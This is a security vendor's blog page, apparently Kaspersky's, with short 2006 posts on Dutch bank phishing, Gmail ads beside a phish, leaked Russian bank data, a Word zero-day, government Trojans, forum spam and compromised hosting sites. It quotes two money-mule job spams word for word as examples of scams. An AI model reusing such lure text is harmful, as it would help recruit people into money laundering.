13 Jun AutoRun. Reloaded Konstantin Markov
06 Jun The most sophisticated Android Trojan Roman Unuchek
03 Jun Security policies: portable applications Kirill Kruglov
03 Jun What are children doing online? Konstantin Ignatev
03 Jun Jumcar. Peruvian navy? Who could be behind it? [Third part] Jorge Mieres
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
The situation with phishing runs targeted at Dutch banks has remained the same throughout 2006 - very quiet. I started noticing that the criminals were strategically planning their attacks by mostly using holidays to carry out their spam runs. By doing this they were hoping to increase the response time of the people involved in combatting these threats.
Just as I had expected there was a phishing run against the Dutch Postbank on Monday, the first day of Christmas. Although it was Christmas the overall response time from the parties involved didn't really suffer. So that's good.
We detected the phishing sample proactively as Trojan-Spy.HTML.Fraud.gen.
Today we noticed an interesting side effect of this phishing run.
The link in the adress bar is the one spoofed in the phishing email. Firefox makes use of Google's anti-phishing database. Seeing as the fraudulent site is also detected Google accidentily added both sites to the database.
We've reported this to Google. Let's hope this gets fixed soon as quite a lot of Dutch people are worried about this.
Btw, there seems to be some bug in Firefox. For currently unknown reasons Firefox 188.8.131.52 only flags the site after switching tabs.
We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing.
I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website.
What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email. Take a look at the upper left and lower right corners:
I think that adding such links increase user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam.
What do you think? In any case, holidays are unfortunately a busy time for criminals in all spheres, including the Internet. Take care of yourself and safe surfing!
When I have a free 10 - 15 minutes, I sometimes use the time to look at the latest spam. Of course, our antispam program filters it out to a dedicated directory. (I do wonder, though, why spammers persist in sending spam to @kaspersky.com).
Spam can be interesting reading - in English and Russian - I can't read the Japanese or Chinese spam :-) Of course mostly it's fake or grey market medicine, pirate software, designer watches, financial scams etc. etc. ad nauseum ad infinitum.
But I’m starting to see more and more spam which offers a great earning opportunity: work as an agent transferring money via your account to the accounts of some company's clients. And the company will pay the transfer fees. Here’s a couple of the English language examples.
A large European electronics wholesaler OLDI Computers LLC is looking for representatives in Your region. This job will let You make from $500.00 a week. Your duties will include receiving payments from our customers and sending the money to our company via Western Union or Money Gram. You will need to establish a banking account with one of the Your region banks or to use Your personal bank account.
Greetings to everyone who has recieved this letter from us, we which you a best luck in the next year and best luck with us, with our offer. You already know that two biggest events of the year are very close to us and soon will finally be here. Merry Christmas and New Years. We want to which you a best luck already and as a gift we want to offer you a job.
Our company currently is seeking for people who can help us out and earn good money for themselves. We need as many people as possible. You can consider this opportunity as a Christmas Job. You will be able to make quick money everyday, spending 1-3 hours a day, no knowledge requiered, no past experience, anyone can apply. You must be 18+ y/o, you have to be an honest person and responsible. You will like working with us, it will be convenient and easy. Our Big Benefits: 1. You will spend not more than 1-3 hours a day. 2. We pay out everyday. 3. $600-$900 a week guaranteed. To start working with us you need to fill out application at our website http://www..[censored]..com click on "Regsiter" and procceed with registration. When done, we will contact you over the phone and you can consider yourself already part of our team. Sign up right now, time is money and Christmas is almost here, so hurry up!
Of course, paying through a third party account rather than paying the company directly has to be a scam. In cases like this, the recipient is being invited to participate in money laundering - and who'd say agree to that?
But there must be people who do agree, either because they want the money, or because they’re gullible by nature. I’ve got two questions - how much money these intermediaries ever see, and are law enforcement bodies really ready (in terms of legislative support) to cope with such scams?
The Russian black market is getting a lot of publicity at the moment in the Russian media. Why? Because of the latest data theft case - databases allegedly containing the personal details of upwards of 3 million individuals have been leaked from several major Russian banks, and the data is now being sold for between 2,000 - 4,000 roubles (around $76 - $150).
Of course, this is nothing new in any country - there have been lots of high profile reports about data leakage. And in a recent article I highlighted that databases containing data from the customs and passport authorities (among others) are freely available on the Russian black market.
What’s interesting is the media fuss, and the effect it might have on data security. The databases contain information about clients of Russian banks who’ve been refused credit, and those who’ve defaulted, either partially or fully, on their payments. Some journalists have questioned why such data would be of use to criminals. As credit applications in Russia will include personal data like name, address, and passport number, I don’t think this is such a hard question to answer. Similar cases of data theft in the past have led to a wave of scams - one option would be to buy the database, call a creditor and say that you're calling from the bank to collect the debt.
Even though data theft is relatively common in Russia, the media attention might raise public awareness about data security. The case will certainly be a blow to the Russian public's fragile confidence in the banking sector, and it may take a while for the dust to settle. But let's hope that while it’s settling law enforcement agencies will take a long hard look at current cybercrime legislation. And let's also hope that the banking industry will consider making a standard security policy mandatory.
Microsoft has released its latest scheduled patches for a large number of vulnerabilities. Some of them are rated critical, so if you haven't already done so, download the updates and patch your systems now.
Over at the Sans Internet Storm Center, the handlers have put together a very nice table. It includes CVE numbers and notes on whether there are known exploits for the vulnerabilities.
Google Translate seems to think so! And it works in both directions...
Update 12.12.06: Google Translate has now fixed this issue.
A couple of days ago the Suddeutsche Zeitung (a German newspaper) reported on a new type of search tool which the German Federal Office of Criminal Investigation would like to make use of it in the future. Instead of having to go through the tedious formalities of requesting access to a suspect’s house and confiscating any computers there, a law enforcement agency will be able to remotely access and monitor a suspect’s machine.
Of course, there aren't any details given about how this will be done. How exactly access to data will be realized hasn’t been detailed. But regular readers of this blog might remember my post about its Swiss counterpart: spyware written for use by the authorities to track suspects. There wasn’t any further information given about how this software would be installed, either. Two possible methods would either be installation via unpatched vulnerabilities in operating systems or other software; or using the classic method of sending the program as an attachment to email, and banking on the user opening and launching the program.
So the Suddeutsche Zeitung article isn’t the first report we’ve seen about malware financed by the authorities, and it certainly won't be the last. If we assume that every country of a reasonable size is currently developing (or using) its own Trojan program, then it's only a matter of time before we get a sample of one of these things. And who knows - it could be that we’ve already got one without knowing exactly what it is. After all, a Trojan used by the authorities is hardly likely to send data it harvests to an easily identifiable police server...
'Patch Tuesday' looms again: the next scheduled Security Bulletin release is 12th December, so get ready for next week's patches.
Hopefully, Microsoft will manage to include a patch for the vulnerability currently being exploited in what the company refers to as 'limited "zero-day" attacks'. The vulnerability is present in Microsoft Word 2000, Microsoft Word 2002, Microsoft Office Word 2003, Microsoft Word Viewer 2003, Microsoft Word 2004 for Mac, and Microsoft Word 2004 v. X for Mac, as well as Microsoft Works 2004, 2005, and 2006.
It seems the attack can only be carried out if a user first opens a malicious Word file which is attached to an email or has been delivered by the attacker in some other way.
Doubtless Microsoft will provide more information as investigations proceed; we're monitoring the situation. In the meantime, Microsoft is advising its customers as 'a best practice', to exercise extreme caution when opening unsolicited attachments from both known and unknown sources.
I've just bumped into some social engineering on a massive scale - spam that hit a huge number of message boards at once.
It’s pretty elementary in some ways - a post which says
Andre call me ,please ! Or my ICQ – 256***** .Sorry for offtop o:( .
Of course, the message won’t have a long life span - spam like this gets deleted pretty quickly from well moderated boards. This means, of course, that spammers have to continually think up new ways to grab a user’s interest.
Anyone who’s curious, or foolish enough, to try contacting the icq number could end up receiving anything, ranging from unsolicited advertizing to a link to a brand new worm. Yesterday’s spam is a clear attempt to move away from a banal offer towards dialogue with the user. After all, an ICQ number could easily have a bot at the other end - a bot which might even manage to persuade the user that it’s a human being. And if a user thinks there’s a human being on the other side of the screen, s/he’s all the more likely to open any links sent...including those that lead to new malware.
Already in its 9th edition, AVAR has established itself as an important security event where the information presented can be just as exotic as the locations where it's held. The location chosen for this year's edition was Auckland, New Zealand - the home of the Maori, the Kiwi and the "All Blacks", the number one rugby team in the world. The architecture is just as impressive.
The subjects covered new threats such as mobile malware and VoIP attacks but also classic questions such as phishing, Virtual Machines, and last but not least, classification and virus naming.
An interesting presentation was given by Jonathan Poon from Microsoft, who spoke about their in-house release scanning system. This system is how Microsoft provides its software, both online and boxed, in a malware-free form. Jonathan maintains a personal weblog where he regularly writes about security and malware from his unique perspective. Feel free to check it out.
One of the most discussed subjects at AVAR 2006 has been the decreasing prevalence of global virus outbreaks and the huge rise in local and targeted attacks. Along with user education and security awareness, these will probably be our main focus points in 2007.
Yesterday, one of our users contacted us to tell us about the strange behaviour of his browser. He’d been looking at www.5755.ru - his browser opened a second web page, and his Web anti-virus warned him that a Trojan program was being downloaded.
The user went to this site after he'd seen it advertized on television. He almost fell victim to a malicious attack - the site’s homepage contained a script that downloads Trojan-Downloader.JS.Psyme.ct, which in turn downloads Trojan-Downloader.Win32.Tiny.eo. Of course, the malicious programs placed on the site change from day to day, but happyily, the Web anti-virus module in Kaspersky Anti-Virus 6.0 prevented this user from getting infected.
After investigating this a bit further, it turned out that at least 470 other servers had been subject to the same hacker attack. We found this out by entering a string from the script which had been injected into the site into Google.
All these servers had one thing in common - they were all hosted by Valuehost, the biggest hosting provider in Russia, which offers a home to more than 60,000 Russian web sites. Of course, the Valuehost administrators have been informed of the problem.